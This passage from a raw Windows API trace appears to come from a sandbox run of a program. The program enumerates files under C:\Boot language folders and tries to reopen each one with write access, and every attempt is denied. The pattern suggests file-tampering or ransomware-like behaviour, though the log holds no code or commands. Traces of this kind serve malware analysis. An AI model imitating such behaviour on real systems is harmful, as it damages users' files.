Flags=0x0, Size=0x14) returned 0x5c940 [0083.543] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0083.543] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0083.543] FindFirstFileExW (in: lpFileName="C:\\Boot\\ja-JP\\*", fInfoLevelId=0x0, lpFindFileData=0x327efb8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x0 | out: lpFindFileData=0x327efb8) returned 0x78110 [0083.543] FindNextFileW (in: hFindFile=0x78110, lpFindFileData=0x327ed3c | out: lpFindFileData=0x327ed3c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc48c6596, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xa010d0c0, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xef5ed6c6, ftLastWriteTime.dwHighDateTime=0x1d3273d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0083.543] FindNextFileW (in: hFindFile=0x78110, lpFindFileData=0x327ed3c | out: lpFindFileData=0x327ed3c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc48c6596, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xc48c6596, ftLastAccessTime.dwHighDateTime=0x1d32764, ftLastWriteTime.dwLowDateTime=0x21212f9a, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x10760, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0083.543] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0083.543] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0083.543] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0083.543] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0083.543] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0083.543] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0083.543] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0083.543] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0083.543] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0083.543] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0083.543] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0083.543] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x68) returned 0x46668 [0083.543] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88680 | out: hHeap=0x20000) returned 1 [0083.543] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d090 [0083.543] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cf40 [0083.543] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d090 | out: hHeap=0x20000) returned 1 [0083.543] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cf40 | out: hHeap=0x20000) returned 1 [0083.543] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfc0 [0083.543] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cf40 [0083.543] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfc0 | out: hHeap=0x20000) returned 1 [0083.543] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cf40 | out: hHeap=0x20000) returned 1 [0083.543] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0083.543] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88680 [0083.543] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0083.543] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x533b8 [0083.543] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88680 | out: hHeap=0x20000) returned 1 [0083.544] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0083.544] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53838 [0083.544] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x533b8 | out: hHeap=0x20000) returned 1 [0083.544] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.544] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.544] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.544] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.544] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53838 | out: hHeap=0x20000) returned 1 [0083.544] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0083.544] AreFileApisANSI () returned 1 [0083.544] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Boot\\ja-JP\\bootmgr.exe.mui", cchWideChar=-1, lpMultiByteStr=0x327f67c, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Boot\\ja-JP\\bootmgr.exe.mui", lpUsedDefaultChar=0x0) returned 30 [0083.544] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88680 [0083.544] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.544] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.544] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf70 [0083.544] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf90 [0083.544] AreFileApisANSI () returned 1 [0083.544] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x88680, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 30 [0083.544] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x3c) returned 0x53838 [0083.544] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x88680, cbMultiByte=-1, lpWideCharStr=0x53838, cchWideChar=30 | out: lpWideCharStr="C:\\Boot\\ja-JP\\bootmgr.exe.mui") returned 30 [0083.544] CreateFileW (lpFileName="C:\\Boot\\ja-JP\\bootmgr.exe.mui" (normalized: "c:\\boot\\ja-jp\\bootmgr.exe.mui"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x327f5a4, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x42c [0083.544] GetFileType (hFile=0x42c) returned 0x1 [0083.544] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53838 | out: hHeap=0x20000) returned 1 [0083.545] SetFilePointerEx (in: hFile=0x42c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f660 | out: lpNewFilePointer=0x0) returned 1 [0083.545] SetFilePointerEx (in: hFile=0x42c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f614 | out: lpNewFilePointer=0x0) returned 1 [0083.545] SetFilePointerEx (in: hFile=0x42c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f62c | out: lpNewFilePointer=0x0) returned 1 [0083.545] CloseHandle (hObject=0x42c) returned 1 [0083.545] AreFileApisANSI () returned 1 [0083.545] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x88680, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 30 [0083.545] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x3c) returned 0x533b8 [0083.545] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x88680, cbMultiByte=-1, lpWideCharStr=0x533b8, cchWideChar=30 | out: lpWideCharStr="C:\\Boot\\ja-JP\\bootmgr.exe.mui") returned 30 [0083.545] CreateFileW (lpFileName="C:\\Boot\\ja-JP\\bootmgr.exe.mui" (normalized: "c:\\boot\\ja-jp\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f630, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0083.545] GetLastError () returned 0x5 [0083.546] GetLastError () returned 0x5 [0083.546] SetLastError (dwErrCode=0x5) [0083.546] GetLastError () returned 0x5 [0083.546] SetLastError (dwErrCode=0x5) [0083.546] GetLastError () returned 0x5 [0083.546] SetLastError (dwErrCode=0x5) [0083.546] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x533b8 | out: hHeap=0x20000) returned 1 [0083.546] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf90 | out: hHeap=0x20000) returned 1 [0083.546] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf70 | out: hHeap=0x20000) returned 1 [0083.546] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88680 | out: hHeap=0x20000) returned 1 [0083.546] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.546] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.546] FindNextFileW (in: hFindFile=0x78110, lpFindFileData=0x327f218 | out: lpFindFileData=0x327f218*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc48c6596, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xef5ed6c6, ftLastAccessTime.dwHighDateTime=0x1d3273d, ftLastWriteTime.dwLowDateTime=0xf300233f, ftLastWriteTime.dwHighDateTime=0x1d2a02f, nFileSizeHigh=0x0, nFileSizeLow=0xa798, dwReserved0=0x327f590, dwReserved1=0x77892bc0, cFileName="memtest.exe.mui", cAlternateFileName="MEMTES~1.MUI")) returned 1 [0083.546] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0083.546] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0083.546] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0083.546] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88680 [0083.546] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0083.546] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0083.546] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0083.546] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88680 | out: hHeap=0x20000) returned 1 [0083.546] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d090 [0083.546] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cf40 [0083.546] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d090 | out: hHeap=0x20000) returned 1 [0083.546] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cf40 | out: hHeap=0x20000) returned 1 [0083.546] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf90 [0083.546] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cf40 [0083.546] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf90 | out: hHeap=0x20000) returned 1 [0083.546] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cf40 | out: hHeap=0x20000) returned 1 [0083.546] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88680 [0083.546] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0083.546] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0083.546] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x538c8 [0083.546] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0083.547] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0083.547] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x533b8 [0083.547] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x538c8 | out: hHeap=0x20000) returned 1 [0083.547] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.547] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.547] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.547] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.547] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x533b8 | out: hHeap=0x20000) returned 1 [0083.547] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88680 | out: hHeap=0x20000) returned 1 [0083.547] AreFileApisANSI () returned 1 [0083.547] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Boot\\ja-JP\\memtest.exe.mui", cchWideChar=-1, lpMultiByteStr=0x327f67c, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Boot\\ja-JP\\memtest.exe.mui", lpUsedDefaultChar=0x0) returned 30 [0083.547] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0083.547] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.547] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.547] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfe0 [0083.547] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf70 [0083.547] AreFileApisANSI () returned 1 [0083.547] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x883b0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 30 [0083.547] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x3c) returned 0x534d8 [0083.547] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x883b0, cbMultiByte=-1, lpWideCharStr=0x534d8, cchWideChar=30 | out: lpWideCharStr="C:\\Boot\\ja-JP\\memtest.exe.mui") returned 30 [0083.547] CreateFileW (lpFileName="C:\\Boot\\ja-JP\\memtest.exe.mui" (normalized: "c:\\boot\\ja-jp\\memtest.exe.mui"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x327f5a4, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x42c [0083.547] GetFileType (hFile=0x42c) returned 0x1 [0083.547] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x534d8 | out: hHeap=0x20000) returned 1 [0083.548] SetFilePointerEx (in: hFile=0x42c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f660 | out: lpNewFilePointer=0x0) returned 1 [0083.548] SetFilePointerEx (in: hFile=0x42c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f614 | out: lpNewFilePointer=0x0) returned 1 [0083.548] SetFilePointerEx (in: hFile=0x42c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f62c | out: lpNewFilePointer=0x0) returned 1 [0083.548] CloseHandle (hObject=0x42c) returned 1 [0083.548] AreFileApisANSI () returned 1 [0083.548] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x883b0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 30 [0083.548] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x3c) returned 0x53640 [0083.548] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x883b0, cbMultiByte=-1, lpWideCharStr=0x53640, cchWideChar=30 | out: lpWideCharStr="C:\\Boot\\ja-JP\\memtest.exe.mui") returned 30 [0083.548] CreateFileW (lpFileName="C:\\Boot\\ja-JP\\memtest.exe.mui" (normalized: "c:\\boot\\ja-jp\\memtest.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f630, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0083.548] GetLastError () returned 0x5 [0083.548] GetLastError () returned 0x5 [0083.548] SetLastError (dwErrCode=0x5) [0083.549] GetLastError () returned 0x5 [0083.549] SetLastError (dwErrCode=0x5) [0083.549] GetLastError () returned 0x5 [0083.549] SetLastError (dwErrCode=0x5) [0083.549] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53640 | out: hHeap=0x20000) returned 1 [0083.549] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf70 | out: hHeap=0x20000) returned 1 [0083.549] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfe0 | out: hHeap=0x20000) returned 1 [0083.549] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0083.549] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.549] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.549] FindNextFileW (in: hFindFile=0x78110, lpFindFileData=0x327f218 | out: lpFindFileData=0x327f218*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x327f510, ftCreationTime.dwHighDateTime=0x3a, ftLastAccessTime.dwLowDateTime=0x327f498, ftLastAccessTime.dwHighDateTime=0x77892b2c, ftLastWriteTime.dwLowDateTime=0x68d68, ftLastWriteTime.dwHighDateTime=0x327f288, nFileSizeHigh=0x3a, nFileSizeLow=0x0, dwReserved0=0x327f590, dwReserved1=0x77892bc0, cFileName="", cAlternateFileName="渘Ĉ㪀ā湈Ĉ蘿̧Ꞙ")) returned 0 [0083.549] FindClose (in: hFindFile=0x78110 | out: hFindFile=0x78110) returned 1 [0083.549] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d090 [0083.549] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cf40 [0083.549] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d090 | out: hHeap=0x20000) returned 1 [0083.549] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cf40 | out: hHeap=0x20000) returned 1 [0083.549] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0083.549] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0083.549] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0083.549] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d010 | out: hHeap=0x20000) returned 1 [0083.549] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5c940 | out: hHeap=0x20000) returned 1 [0083.549] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x46668 | out: hHeap=0x20000) returned 1 [0083.549] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf20 [0083.549] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5c940 [0083.549] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf20 | out: hHeap=0x20000) returned 1 [0083.549] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5c940 | out: hHeap=0x20000) returned 1 [0083.549] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d090 [0083.549] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5c940 [0083.549] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d090 | out: hHeap=0x20000) returned 1 [0083.549] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5c940 | out: hHeap=0x20000) returned 1 [0083.549] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0083.550] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88680 [0083.550] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0083.550] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.550] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.550] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.550] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.550] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88680 | out: hHeap=0x20000) returned 1 [0083.550] AreFileApisANSI () returned 1 [0083.550] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Boot\\ko-KR", cchWideChar=-1, lpMultiByteStr=0x327f67c, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Boot\\ko-KR", lpUsedDefaultChar=0x0) returned 14 [0083.550] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.550] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.550] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfc0 [0083.550] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d010 [0083.550] AreFileApisANSI () returned 1 [0083.550] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x327f960, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 14 [0083.550] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x1c) returned 0x887c0 [0083.550] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x327f960, cbMultiByte=-1, lpWideCharStr=0x887c0, cchWideChar=14 | out: lpWideCharStr="C:\\Boot\\ko-KR") returned 14 [0083.550] CreateFileW (lpFileName="C:\\Boot\\ko-KR" (normalized: "c:\\boot\\ko-kr"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x327f5a4, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0083.550] GetLastError () returned 0x5 [0083.550] GetLastError () returned 0x5 [0083.550] SetLastError (dwErrCode=0x5) [0083.550] GetLastError () returned 0x5 [0083.550] SetLastError (dwErrCode=0x5) [0083.550] GetLastError () returned 0x5 [0083.550] SetLastError (dwErrCode=0x5) [0083.550] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0083.551] AreFileApisANSI () returned 1 [0083.551] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x327f960, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 14 [0083.551] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x1c) returned 0x88748 [0083.551] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x327f960, cbMultiByte=-1, lpWideCharStr=0x88748, cchWideChar=14 | out: lpWideCharStr="C:\\Boot\\ko-KR") returned 14 [0083.551] CreateFileW (lpFileName="C:\\Boot\\ko-KR" (normalized: "c:\\boot\\ko-kr"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f630, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0083.551] GetLastError () returned 0x5 [0083.551] GetLastError () returned 0x5 [0083.551] SetLastError (dwErrCode=0x5) [0083.551] GetLastError () returned 0x5 [0083.551] SetLastError (dwErrCode=0x5) [0083.551] GetLastError () returned 0x5 [0083.551] SetLastError (dwErrCode=0x5) [0083.551] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0083.551] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d010 | out: hHeap=0x20000) returned 1 [0083.551] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfc0 | out: hHeap=0x20000) returned 1 [0083.551] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.551] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.551] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.551] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.551] RtlAllocateHeap 